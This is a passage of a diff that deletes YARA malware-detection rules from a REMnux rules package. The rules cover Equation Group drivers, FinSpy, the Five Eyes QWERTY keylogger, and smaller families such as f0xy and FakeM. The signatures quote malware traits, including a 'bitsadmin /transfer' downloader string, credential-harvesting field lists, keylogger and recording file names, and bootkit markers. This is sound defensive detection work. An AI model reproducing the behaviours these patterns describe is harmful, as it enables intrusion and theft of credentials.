-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
-	strings:
-		$mz = { 4d 5a }
-
-		$x1 = "Original Innovations, LLC" fullword wide
-		$x2 = "Moniter Resource Protocol" fullword wide
-		$x3 = "ahlhcib.dll" fullword wide
-
-		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
-		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
-		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
-		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
-		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
-		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
-}
-
-/* Rule generated from the mentioned keywords */
-
-rule Equation_Kaspersky_SuspiciousString {
-	meta:
-		description = "Equation Group Malware - suspicious string found in sample"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/17"
-		score = 60
-	strings:
-		$mz = { 4d 5a }
-
-		$s1 = "i386\\DesertWinterDriver.pdb" fullword
-		$s2 = "Performing UR-specific post-install..."
-		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
-		$s4 = "STRAITSHOOTER30.exe"
-		$s5 = "standalonegrok_2.1.1.1"
-		$s6 = "c:\\users\\rmgree5\\"
-	condition:
-		( $mz at 0 ) and filesize < 500000 and all of ($s*)
-}
-
-/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */
-
-rule EquationDrug_NetworkSniffer1 {
-	meta:
-		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
-	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
-		$s3 = "sys\\mstcp32.dbg" fullword ascii
-		$s7 = "mstcp32.sys" fullword wide
-		$s8 = "p32.sys" fullword ascii
-		$s9 = "\\Device\\%ws_%ws" fullword wide
-		$s10 = "\\DosDevices\\%ws" fullword wide
-		$s11 = "\\Device\\%ws" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_CompatLayer_UnilayDLL {
-	meta:
-		description = "EquationDrug - Unilay.DLL"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
-	strings:
-		$mz = { 4d 5a }
-		$s0 = "unilay.dll" fullword ascii
-	condition:
-		( $mz at 0 ) and $s0
-}
-
-rule EquationDrug_HDDSSD_Op {
-	meta:
-		description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
-	strings:
-		$s0 = "nls_933w.dll" fullword ascii
-	condition:
-		all of them
-}
-
-rule EquationDrug_NetworkSniffer2 {
-	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
-	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "sys\\tdip.dbg" fullword ascii
-		$s4 = "dip.sys" fullword ascii
-		$s5 = "\\Device\\%ws_%ws" fullword wide
-		$s6 = "\\DosDevices\\%ws" fullword wide
-		$s7 = "\\Device\\%ws" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_NetworkSniffer3 {
-	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "14599516381a9646cd978cf962c4f92386371040"
-	strings:
-		$s0 = "Corporation. All rights reserved." fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "tdip.pdb" fullword ascii
-	condition:
-		all of them
-}
-
-rule EquationDrug_VolRec_Driver {
-	meta:
-		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
-	strings:
-		$s0 = "msrstd.sys" fullword wide
-		$s1 = "msrstd.pdb" fullword ascii
-		$s2 = "msrstd driver" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_KernelRootkit {
-	meta:
-		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
-	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "Parmsndsrv.dbg" fullword ascii
-		$s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
-		$s3 = "msndsrv.sys" fullword wide
-		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
-		$s6 = "\\Device\\%ws_%ws" fullword wide
-		$s7 = "\\DosDevices\\%ws" fullword wide
-		$s9 = "\\Device\\%ws" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_Keylogger {
-	meta:
-		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
-	strings:
-		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
-		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
-		$s3 = "\\DosDevices\\Gk" fullword wide
-		$s5 = "\\Device\\Gk0" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_NetworkSniffer4 {
-	meta:
-		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
-	strings:
-		$s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
-		$s1 = "\\systemroot\\" fullword ascii
-		$s2 = "RAVISENT Technologies Inc." fullword wide
-		$s3 = "Created by VIONA Development" fullword wide
-		$s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
-		$s5 = "\\device\\harddiskvolume" fullword wide
-		$s7 = "ATMDKDRV.SYS" fullword wide
-		$s8 = "\\Device\\%ws_%ws" fullword wide
-		$s9 = "\\DosDevices\\%ws" fullword wide
-		$s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
-		$s11 = "\\Device\\%ws" fullword wide
-		$s13 = "CineMaster C 1.1 WDM" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_PlatformOrchestrator {
-	meta:
-		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
-	strings:
-		$s0 = "SERVICES.EXE" fullword wide
-		$s1 = "\\command.com" fullword wide
-		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s3 = "LSASS.EXE" fullword wide
-		$s4 = "Windows Configuration Services" fullword wide
-		$s8 = "unilay.dll" fullword ascii
-	condition:
-		all of them
-}
-
-rule EquationDrug_NetworkSniffer5 {
-	meta:
-		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
-	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
-		$s2 = "atmdkdrv.sys" fullword wide
-		$s4 = "\\Device\\%ws_%ws" fullword wide
-		$s5 = "\\DosDevices\\%ws" fullword wide
-		$s6 = "\\Device\\%ws" fullword wide
-	condition:
-		all of them
-}
-
-rule EquationDrug_FileSystem_Filter {
-	meta:
-		description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
-		author = "Florian Roth @4nc4p"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		date = "2015/03/11"
-		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
-	strings:
-		$s0 = "volrec.sys" fullword wide
-		$s1 = "volrec.pdb" fullword ascii
-		$s2 = "Volume recognizer driver" fullword wide
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Ezcob.yara remnux-rules-0.0.4/yara/Ezcob.yara
--- remnux-rules-0.0.3/yara/Ezcob.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Ezcob.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,35 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule EzcobStrings : Ezcob Family
-{
-    meta:
-        description = "Ezcob Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    strings:
-        $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
-        $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
-        $ = "Ezcob" wide ascii
-        $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
-        $ = "20110113144935"
-        
-    condition:
-       any of them
-}
-
-rule Ezcob : Family
-{
-    meta:
-        description = "Ezcob"
-        author = "Seth Hardy"
-        last_modified = "2014-06-23"
-        
-    condition:
-        EzcobStrings
-}
diff -Nru remnux-rules-0.0.3/yara/F0xy.yara remnux-rules-0.0.4/yara/F0xy.yara
--- remnux-rules-0.0.3/yara/F0xy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/F0xy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule ws_f0xy_downloader {
-  meta:
-    description = "f0xy malware downloader"
-    author = "Nick Griffin (Websense)"
-
-  strings:
-    $mz="MZ"
-    $string1="bitsadmin /transfer"
-    $string2="del rm.bat"
-    $string3="av_list="
-  
-  condition:
-    ($mz at 0) and (all of ($string*))
-}
diff -Nru remnux-rules-0.0.3/yara/FakeM.yara remnux-rules-0.0.4/yara/FakeM.yara
--- remnux-rules-0.0.3/yara/FakeM.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/FakeM.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,24 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule HTMLVariant : FakeM Family HTML Variant
-{
-	meta:
-		description = "Identifier for html variant of FAKEM"
-		author = "Katie Kleemola"
-		last_updated = "2014-05-20"
-	
-	strings:
-		// decryption loop
-		$s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
-		//mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F
-		$s2 = { C6 45 F? (3?|4?) }
-
-	condition:
-		$s1 and #s2 == 16
-
-}
diff -Nru remnux-rules-0.0.3/yara/favorite.yara remnux-rules-0.0.4/yara/favorite.yara
--- remnux-rules-0.0.3/yara/favorite.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/favorite.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,38 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule FavoriteCode : Favorite Family 
-{
-    meta:
-        description = "Favorite code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-24"
-    
-    strings:
-        // standard string hiding
-        $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
-        $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
-    
-    condition:
-        any of them
-}
-
-rule FavoriteStrings : Favorite Family
-{
-    meta:
-        description = "Favorite Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-24"
-        
-    strings:
-        $string1 = "!QAZ4rfv"
-        $file1 = "msupdater.exe"
-        $file2 = "FAVORITES.DAT"
-        
-    condition:
-       any of ($string*) or all of ($file*)
-}
diff -Nru remnux-rules-0.0.3/yara/FinSpy.yara remnux-rules-0.0.4/yara/FinSpy.yara
--- remnux-rules-0.0.3/yara/FinSpy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/FinSpy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,138 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule FinSpy_2
-{
-    meta:
-        description = "FinFisher FinSpy"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $password1 = /\/scomma kbd101\.sys/ wide ascii
-        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
-        $password3 = /\/scomma excel2010\.part/ wide ascii
-        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
-        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
-        $password6 = /\/scomma MSN2010\.dll/ wide ascii
-        $password7 = /\/scomma Firefox\.base/ wide ascii
-        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
-        $password9 = /\/scomma IE7setup\.sys/ wide ascii
-        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
-        $password11 = /\/scomma office2007\.cab/ wide ascii
-        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
-        $password13 = /\/scomma outlook2007\.dll/ wide ascii
-        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
-
-        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
-        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
-        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
-        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
-        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
-        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
-        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
-
-        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
-        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
-
-        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
-
-        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
-        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
-        $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
-
-        $mouserec1 = /(m)sc183Q000\.dat/ wide ascii
-        $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
-
-        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
-
-        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
-        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
-
-        $versions1 = /(f)inspyv2/ nocase
-        $versions2 = /(f)inspyv4/ nocase
-
-        $bootkit1 = /(b)ootkit_x32driver/
-        $bootkit2 = /(b)ootkit_x64driver/
-
-        $typo1 = /(S)creenShort Recording/ wide
-
-        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
-
-    condition:
-        8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
-}
-
-rule FinSpy
-{
-    meta:
-        description = "FinFisher FinSpy"
-        author = "AlienVault Labs"
-
-    strings:
-        $filter1 = "$password14"
-        $filter2 = "$screenrec7"
-        $filter3 = "$micrec"
-        $filter4 = "$skyperec3"
-        $filter5 = "$mouserec2"
-        $filter6 = "$driver"
-        $filter7 = "$janedow2"
-        $filter8 = "$bootkit2"
-
-        $password1 = /\/scomma kbd101\.sys/ wide ascii
-        $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
-        $password3 = /\/scomma excel2010\.part/ wide ascii
-        $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
-        $password5 = /\/stab MSVCR32\.manifest/ wide ascii
-        $password6 = /\/scomma MSN2010\.dll/ wide ascii
-        $password7 = /\/scomma Firefox\.base/ wide ascii
-        $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
-        $password9 = /\/scomma IE7setup\.sys/ wide ascii
-        $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
-        $password11 = /\/scomma office2007\.cab/ wide ascii
-        $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
-        $password13 = /\/scomma outlook2007\.dll/ wide ascii
-        $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
-
-        $screenrec1 = /(s)111o00000000\.dat/ wide ascii
-        $screenrec2 = /(t)111o00000000\.dat/ wide ascii
-        $screenrec3 = /(f)113o00000000\.dat/ wide ascii
-        $screenrec4 = /(w)114o00000000\.dat/ wide ascii
-        $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
-        $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
-        $screenrec7 = /(v)112O00000000\.dat/ wide ascii
-
-        //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
-        //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
-
-        $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
-
-        $skyperec1 = /\[%19s\] %25s\:    %s/ wide ascii
-        $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
-        //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
-
-        //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii
-        //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
-
-        $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
-
-        $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
-        $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
-
-        //$versions1 = /(f)inspyv2/ nocase
-        //$versions2 = /(f)inspyv4/ nocase
-
-        $bootkit1 = /(b)ootkit_x32driver/
-        $bootkit2 = /(b)ootkit_x64driver/
-
-        $typo1 = /(S)creenShort Recording/ wide
-
-        $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
-
-    condition:
-        (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
-}
-
diff -Nru remnux-rules-0.0.3/yara/FiveEyes.yara remnux-rules-0.0.4/yara/FiveEyes.yara
--- remnux-rules-0.0.3/yara/FiveEyes.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/FiveEyes.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,241 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-/* FIVE EYES ------------------------------------------------------------------------------- */
-
-rule FiveEyes_QUERTY_Malwareqwerty_20121 {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
-	strings:
-		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20121.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
-	condition:
-		9 of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20123_sys {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
-	strings:
-		$s0 = "20123.dll" fullword ascii
-		$s1 = "kbdclass.sys" fullword wide
-		$s2 = "IoFreeMdl" fullword ascii
-		$s3 = "ntoskrnl.exe" fullword ascii
-		$s4 = "KfReleaseSpinLock" fullword ascii
-	condition:
-		all of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
-	strings:
-		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
-		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
-		$s2 = "<commands/>" fullword ascii
-		$s3 = "</version>" fullword ascii
-		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
-		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
-		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
-		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
-		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s9 = "<minorType>0</minorType>" fullword ascii
-		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
-		$s11 = "</comments>" fullword ascii
-		$s12 = "<comments>" fullword ascii
-		$s13 = "<majorType>1</majorType>" fullword ascii
-		$s14 = "<files>None</files>" fullword ascii
-		$s15 = "<poc>Erebus</poc>" fullword ascii
-		$s16 = "</plugin>" fullword ascii
-		$s17 = "<team>None</team>" fullword ascii
-		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
-		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
-		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
-	condition:
-		14 of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20121_dll {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "89504d91c5539a366e153894c1bc17277116342b"
-	strings:
-		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
-		$s1 = "20121.dll" fullword ascii
-	condition:
-		all of them
-}
-rule FiveEyes_QUERTY_Malwareqwerty_20123 {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
-	strings:
-		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
-		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
-		$s2 = "<name>20123.sys</name>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
-		$s5 = "<platform type=\"1\">" fullword ascii
-		$s6 = "</plugin>" fullword ascii
-		$s7 = "</pluginConfig>" fullword ascii
-		$s8 = "<pluginConfig>" fullword ascii
-		$s9 = "</platform>" fullword ascii
-		$s10 = "</lpConfig>" fullword ascii
-		$s11 = "<lpConfig>" fullword ascii
-	condition:
-		9 of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20120_dll {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
-	strings:
-		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
-		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
-		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
-		$s3 = "- Log Used (number of windows) - %d" fullword wide
-		$s4 = "- Log Limit (number of windows) - %d" fullword wide
-		$s5 = "Process or User Default Language" fullword wide
-		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
-		$s7 = "- Logging of keystrokes is switched ON" fullword wide
-		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
-		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
-		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
-		$s11 = "FAILED to get Qwerty Status" fullword wide
-		$s12 = "- Successfully retrieved Log from Implant." fullword wide
-		$s13 = "- Logging of all Windows is toggled ON" fullword wide
-		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
-		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
-		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
-		$s17 = "The implant failed to return a valid status" fullword ascii
-		$s18 = "- Log files were NOT generated!" fullword wide
-		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
-		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
-	condition:
-		10 of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
-	strings:
-		$s0 = "This PPC gets the current keystroke log." fullword ascii
-		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
-		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
-		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
